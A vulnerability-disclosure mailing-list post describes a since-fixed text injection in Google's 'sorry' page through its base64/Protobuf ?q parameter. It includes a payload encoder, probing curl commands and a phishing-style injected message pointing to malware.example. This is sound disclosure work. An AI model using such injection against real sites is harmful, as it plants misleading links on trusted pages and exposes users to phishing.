I tested a few more times, and it appears the text injection has
disappeared.

These are the times at which I tested, with offsets relative to the
initial discovery.

+0h     2025-01-28 03:00        initial discovery
+5h     2025-01-28 08:19        ?q=EgtoZWxsbyB3b3JsZA works
                                (https://archive.is/DD9xB)
+14h    2025-01-28 17:31        ?q=EgtoZWxsbyB3b3JsZA works
                                (no archive)
+45h    2025-01-30 00:18        ?q=EgtoZWxsbyB3b3JsZA doesn't work
                                (https://archive.is/0PJRW)

On Tue, Jan 28, 2025 at 02:26:16AM -0700, David Fifield wrote:
> The page https://www.google.com/sorry/index is familiar to Tor and VPN
> users. It is the one that says "Our systems have detected unusual
> traffic from your computer network. Please try your request again
> later." You will frequently be redirected to this page when using Tor
> Browser, when you do a search on a Google site such as www.youtube.com
> or scholar.google.com. The text of the page reports the client IP
> address, a timestamp of the request, and the URL that was requested.
> 
> At 2025-01-28 03:00 or earlier, the "sorry" page changed its behavior
> from what I have seen before. After the client IP address, the page now
> displays " ≠ ", followed by a few apparently nonsense bytes (not even
> necessarily properly UTF-8–encoded). The extra bytes turn out to come
> from a data structure that is encoded in the ?q URL query parameter. By
> changing the ?q parameter, you can make the string of bytes have any
> length and contents you like. The byte string will be included in the
> HTML body, after the client IP address and " ≠ ". However, any bytes
> that have meaning in HTML will be HTML-escaped, so while you can make
> text appear on the page, no XSS is possible, as far as I can tell.
> 
> This is a simple demonstration:
> 
>       https://www.google.com/sorry/index?q=EgtoZWxsbyB3b3JsZA
>       (archived) https://archive.is/DD9xB
> 
> This displays:
> 
>       IP address: <client IP address> ≠ hello world
> 
> Let's decode the ?q payload to see what's going on.
> 
>       $ python3 -c 'import base64; print(repr(base64.urlsafe_b64decode("EgtoZWxsbyB3b3JsZA==")))'
>       b'\x12\x0bhello world'
> 
> After base64 decoding, the first byte is 0x12, which is some kind of
> data type indicator. The second byte, 0x0b, is the length of the value
> to follow. Then the value is what ends up being copied into the page.
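
If the payload is Protobuf throughout (an assumption on my part; the
server's actual schema is unknown), the 0x12 byte would be a field tag
rather than an ad hoc type code. In the Protobuf wire format a tag is
(field_number << 3) | wire_type, so 0x12 would mean field 2 with wire
type 2 (length-delimited). A minimal sketch of that split:

```python
# Assumption: 0x12 is a Protobuf tag byte. The split below follows the
# public Protobuf wire format, not any known Google schema.
tag = 0x12
field_number = tag >> 3   # upper bits carry the field number
wire_type = tag & 0x07    # low 3 bits carry the wire type (2 = length-delimited)
print(field_number, wire_type)  # 2 2
```
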
> 
> The length field is actually a Protobuf varint. Lengths greater than 127
> need to be encoded as more than 1 byte:
> https://protobuf.dev/programming-guides/encoding/#varints
> The following is a Python program to encode arbitrary byte strings
> appropriately for the ?q parameter:
> 
> #!/usr/bin/env python3
> import base64
> import sys
> if len(sys.argv) > 1:
>     payload, = sys.argv[1:]
>     payload = payload.encode()
> else:
>     payload = sys.stdin.buffer.read()
> def encode_varint(n):
>     e = [n & 0x7f]
>     n >>= 7
>     while n > 0:
>         e[len(e) - 1] |= 0x80
>         e.append(n & 0x7f)
>         n >>= 7
>     return bytes(e)
> print(base64.urlsafe_b64encode(b"\x12" + encode_varint(len(payload)) + payload).rstrip(b"=").decode())
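
For inspecting ?q values in the other direction, something like the
following decoder may help. It is only a sketch: the names decode_varint
and decode_q are mine, it assumes the whole value is a sequence of
Protobuf-style fields, and it handles only varint (0) and
length-delimited (2) wire types, raising an error on anything else.

```python
import base64

def decode_varint(buf, pos):
    """Return (value, next_pos) for the varint starting at buf[pos]."""
    value = 0
    shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7f) << shift
        if not b & 0x80:  # high bit clear: this was the last byte
            return value, pos
        shift += 7

def decode_q(q):
    """Decode a ?q string into a list of (field_number, wire_type, value)."""
    # Restore the base64 padding that is stripped in URLs.
    raw = base64.urlsafe_b64decode(q + "=" * (-len(q) % 4))
    fields = []
    pos = 0
    while pos < len(raw):
        tag, pos = decode_varint(raw, pos)
        field_number, wire_type = tag >> 3, tag & 0x07
        if wire_type == 0:    # varint value
            value, pos = decode_varint(raw, pos)
        elif wire_type == 2:  # length-delimited value
            length, pos = decode_varint(raw, pos)
            value = raw[pos:pos + length]
            pos += length
        else:
            raise ValueError(f"unhandled wire type {wire_type} at offset {pos}")
        fields.append((field_number, wire_type, value))
    return fields

print(decode_q("EgtoZWxsbyB3b3JsZA"))
# [(2, 2, b'hello world')]
```
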
> 
> Use it as follows, for example:
> 
>       $ curl "https://www.google.com/sorry/index?q=$(printf 'hello world' | ./sorry-payload)"
> 
> You can see what HTML escaping the server applies by sending a string
> that consists of every byte value:
> 
>       $ curl "https://www.google.com/sorry/index?q=$(for c in $(seq 0 255); do printf '\x'$(printf %02x $c); done | ./sorry-payload)" -o resp
> 
> 00000000: 0001 0203 0405 0607 0820 2020 2020 0e0f  .........     ..
> 00000010: 1011 1213 1415 1617 1819 1a1b 1c1d 1e1f  ................
> 00000020: 2021 2671 756f 743b 2324 2526 616d 703b   !&quot;#$%&amp;
> 00000030: 2623 3339 3b28 292a 2b2c 2d2e 2f30 3132  &#39;()*+,-./012
> 00000040: 3334 3536 3738 393a 3b26 6c74 3b3d 2667  3456789:;&lt;=&g
> 00000050: 743b 3f40 4142 4344 4546 4748 494a 4b4c  t;?@ABCDEFGHIJKL
> 00000060: 4d4e 4f50 5152 5354 5556 5758 595a 5b5c  MNOPQRSTUVWXYZ[\
> 00000070: 5d5e 5f60 6162 6364 6566 6768 696a 6b6c  ]^_`abcdefghijkl
> 00000080: 6d6e 6f70 7172 7374 7576 7778 797a 7b7c  mnopqrstuvwxyz{|
> 00000090: 7d7e 7f80 8182 8384 8586 8788 898a 8b8c  }~..............
> 000000a0: 8d8e 8f90 9192 9394 9596 9798 999a 9b9c  ................
> 000000b0: 9d9e 9fa0 a1a2 a3a4 a5a6 a7a8 a9aa abac  ................
> 000000c0: adae afb0 b1b2 b3b4 b5b6 b7b8 b9ba bbbc  ................
> 000000d0: bdbe bfc0 c1c2 c3c4 c5c6 c7c8 c9ca cbcc  ................
> 000000e0: cdce cfd0 d1d2 d3d4 d5d6 d7d8 d9da dbdc  ................
> 000000f0: ddde dfe0 e1e2 e3e4 e5e6 e7e8 e9ea ebec  ................
> 00000100: edee eff0 f1f2 f3f4 f5f6 f7f8 f9fa fbfc  ................
> 00000110: fdfe ff                                  ...
> 
> The following replacements are applied:
> 
>       0x09    HT      becomes 0x20
>       0x0a    LF      becomes 0x20
>       0x0b    VT      becomes 0x20
>       0x0c    FF      becomes 0x20
>       0x0d    CR      becomes 0x20
>       0x22    "       becomes &quot;
>       0x26    &       becomes &amp;
>       0x27    '       becomes &#39;
>       0x3c    <       becomes &lt;
>       0x3e    >       becomes &gt;
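
The replacement table above is small enough to model locally. The
following is a sketch of the observed behavior, not the server's code;
the names REPLACEMENTS and sorry_escape are mine. Applied to all 256
byte values it produces 275 bytes, which matches the length of the hex
dump above (0x113).

```python
# Replacements copied from the table above; every other byte passes through.
REPLACEMENTS = {
    0x09: b" ", 0x0a: b" ", 0x0b: b" ", 0x0c: b" ", 0x0d: b" ",
    0x22: b"&quot;",
    0x26: b"&amp;",
    0x27: b"&#39;",
    0x3c: b"&lt;",
    0x3e: b"&gt;",
}

def sorry_escape(payload: bytes) -> bytes:
    """Model of the escaping observed on the "sorry" page."""
    return b"".join(REPLACEMENTS.get(b, bytes([b])) for b in payload)

escaped = sorry_escape(bytes(range(256)))
print(len(escaped))  # 275
```
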
> 
> Besides 0x12, there are other type codes normally present in the ?q
> parameter. Collect a few ?q parameter values organically, base64 decode
> them, and you will see similar structures and repeated byte strings. If
> ?q contains more than one 0x12 specification, it looks like the last one
> wins. In the ?q values I saw, the 0x12 value was 4 bytes long, and
> contained the IPv4 address of a Tor exit node. The " ≠ " after the
> textual client IP address makes it look like it's some debugging code
> related to IP address comparison.
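
Two of the observations above can be sketched in a few lines: building
a ?q value with two 0x12 entries (to check which one is displayed), and
reading a 4-byte value as an IPv4 address. The helper names field2 and
to_q are mine, and 192.0.2.1 is a documentation address used as a
placeholder, not a value I observed.

```python
import base64
import ipaddress

def field2(value: bytes) -> bytes:
    """One 0x12 entry; this sketch only supports single-byte lengths."""
    assert len(value) < 128
    return b"\x12" + bytes([len(value)]) + value

def to_q(raw: bytes) -> str:
    """URL-safe base64 without padding, as used in the ?q parameter."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

# Two 0x12 entries in one payload; per the message, the last one seemed to win.
raw = field2(b"first") + field2(b"second")
print("https://www.google.com/sorry/index?q=" + to_q(raw))

# A 4-byte value read as a packed IPv4 address (placeholder bytes).
example_value = bytes([192, 0, 2, 1])
print(ipaddress.IPv4Address(example_value))  # 192.0.2.1
```
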
> 
> You can get the "sorry" page in languages other than English using
> either the ?hl URL query parameter or the Accept-Language HTTP header.
> The languages I tried used the same escaping as the default English one.
> The ?ie and ?oe (input encoding and output encoding;
> https://developers.google.com/custom-search/docs/xml_results#wsCharacterEncoding)
> parameters do not appear to have any effect.
> 
>       $ curl "https://www.google.com/sorry/index?q=$(printf 'hello world' | ./sorry-payload)" -H 'Accept-Language: zh-CN'
>       https://www.google.com/sorry/index?q=EgtoZWxsbyB3b3JsZA&hl=zh-CN
>       (archive) https://archive.is/P6dbS
> 
> Though it's not possible to inject active content such as HTML or
> JavaScript, one could cause a phishing-style plaintext URL to appear on
> the page:
> 
>       $ curl "https://www.google.com/sorry/index?q=$(printf 'Copy and paste this URL to fix the problem: \u27a1\ufe0fhttp://malware.example/\u2b05\ufe0f' | ./sorry-payload)"
>       https://www.google.com/sorry/index?q=Ek9Db3B5IGFuZCBwYXN0ZSB0aGlzIFVSTCB0byBmaXggdGhlIHByb2JsZW06IOKeoe-4j2h0dHA6Ly9tYWx3YXJlLmV4YW1wbGUv4qyF77iP
>       (archive) https://archive.is/D8cf4
> 
> Similar tricks are possible with the ?continue URL query parameter,
> which is omitted in the above examples, but which normally appears in
> redirections to https://www.google.com/sorry/index. The contents of
> ?continue get inserted after the "URL: " label on the page.
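
For anyone retesting, a URL carrying both parameters could be assembled
as below. This is a sketch only: the ?continue value is a made-up
example, and I have not checked how the server treats it now that the
?q injection appears to be gone.

```python
from urllib.parse import urlencode, urlsplit, parse_qs

params = {
    "q": "EgtoZWxsbyB3b3JsZA",
    # Hypothetical ?continue value, for illustration only.
    "continue": "https://www.youtube.com/results?search_query=example",
}
# urlencode percent-encodes the values so they survive as query parameters.
url = "https://www.google.com/sorry/index?" + urlencode(params)
print(url)
```
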
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
